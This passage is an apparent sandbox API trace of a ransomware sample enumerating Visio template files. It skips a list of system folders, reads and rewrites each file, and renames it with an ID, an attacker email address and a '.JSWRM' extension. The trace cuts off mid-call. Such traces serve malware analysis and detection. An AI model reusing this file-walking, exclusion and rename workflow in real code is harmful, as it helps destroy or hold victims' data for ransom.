(in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADO_M.VSSX", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADO_M.VSSX", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADO_M.VSSX", lpUsedDefaultChar=0x0) returned 10 [0143.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADO_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ado_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0143.983] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=184378) returned 1 [0143.983] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.984] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0143.996] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.996] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0143.997] CloseHandle (hObject=0x314) returned 1 [0143.997] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADO_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ado_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADO_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ado_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.998] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c3a235, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c3a235, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c3a235, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2b2ac, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ADO_U.VSSX", cAlternateFileName="ADO_U~1.VSS")) returned 1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2=".") returned 1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="..") returned 1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="...") returned 1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="windows") returned -1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="recovery") returned -1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="perflogs") returned -1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="documents and settings") returned -1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="system volume information") returned -1 [0143.998] lstrcmpiW (lpString1="ADO_U.VSSX", lpString2="msocache") returned -1 [0143.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADO_U.VSSX", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADO_U.VSSX", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADO_U.VSSX", lpUsedDefaultChar=0x0) returned 10 [0143.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADO_U.VSSX", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADO_U.VSSX", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADO_U.VSSX", lpUsedDefaultChar=0x0) returned 10 [0143.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADO_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ado_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.006] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=176812) returned 1 [0144.006] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.006] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0144.017] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.017] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0144.018] CloseHandle (hObject=0x314) returned 1 [0144.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADO_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ado_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADO_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ado_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.019] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1e03f98, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1e03f98, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1e03f98, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1479f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ADS_M.VSSX", cAlternateFileName="ADS_M~1.VSS")) returned 1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2=".") returned 1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="..") returned 1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="...") returned 1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="windows") returned -1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="recovery") returned -1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="perflogs") returned -1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="documents and settings") returned -1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="system volume information") returned -1 [0144.019] lstrcmpiW (lpString1="ADS_M.VSSX", lpString2="msocache") returned -1 [0144.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADS_M.VSSX", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0144.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADS_M.VSSX", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADS_M.VSSX", lpUsedDefaultChar=0x0) returned 10 [0144.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADS_M.VSSX", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0144.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADS_M.VSSX", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADS_M.VSSX", lpUsedDefaultChar=0x0) returned 10 [0144.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ads_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.020] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=83871) returned 1 [0144.020] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.020] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x14790, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x14790, lpOverlapped=0x0) returned 1 [0144.027] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.027] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x14790, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x14790, lpOverlapped=0x0) returned 1 [0144.028] CloseHandle (hObject=0x314) returned 1 [0144.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ads_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADS_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ads_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.029] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c3a235, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c3a235, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c3a235, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x137dc, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ADS_U.VSSX", cAlternateFileName="ADS_U~1.VSS")) returned 1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2=".") returned 1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="..") returned 1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="...") returned 1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="windows") returned -1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="recovery") returned -1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="perflogs") returned -1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="documents and settings") returned -1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="system volume information") returned -1 [0144.029] lstrcmpiW (lpString1="ADS_U.VSSX", lpString2="msocache") returned -1 [0144.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADS_U.VSSX", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0144.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADS_U.VSSX", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADS_U.VSSX", lpUsedDefaultChar=0x0) returned 10 [0144.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADS_U.VSSX", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0144.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADS_U.VSSX", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADS_U.VSSX", lpUsedDefaultChar=0x0) returned 10 [0144.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ads_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.031] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=79836) returned 1 [0144.031] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.031] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x137d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x137d0, lpOverlapped=0x0) returned 1 [0144.038] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.038] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x137d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x137d0, lpOverlapped=0x0) returned 1 [0144.039] CloseHandle (hObject=0x314) returned 1 [0144.039] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ads_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ADS_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ads_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.040] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3221d1a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3221d1a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3221d1a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xe080, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ALARM_M.VSSX", cAlternateFileName="ALARM_~2.VSS")) returned 1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2=".") returned 1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="..") returned 1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="...") returned 1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="windows") returned -1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="recovery") returned -1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="perflogs") returned -1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="documents and settings") returned -1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="system volume information") returned -1 [0144.040] lstrcmpiW (lpString1="ALARM_M.VSSX", lpString2="msocache") returned -1 [0144.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALARM_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALARM_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ALARM_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\alarm_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.041] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=57472) returned 1 [0144.041] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.041] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe080, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xe080, lpOverlapped=0x0) returned 1 [0144.072] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.072] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe080, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xe080, lpOverlapped=0x0) returned 1 [0144.073] CloseHandle (hObject=0x314) returned 1 [0144.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ALARM_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\alarm_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ALARM_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\alarm_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.075] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c3a235, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c3a235, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c3a235, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xda04, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ALARM_U.VSSX", cAlternateFileName="ALARM_~1.VSS")) returned 1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2=".") returned 1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="..") returned 1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="...") returned 1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="windows") returned -1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="recovery") returned -1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="perflogs") returned -1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="documents and settings") returned -1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="system volume information") returned -1 [0144.075] lstrcmpiW (lpString1="ALARM_U.VSSX", lpString2="msocache") returned -1 [0144.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALARM_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALARM_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALARM_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ALARM_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\alarm_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.076] GetFileSizeEx 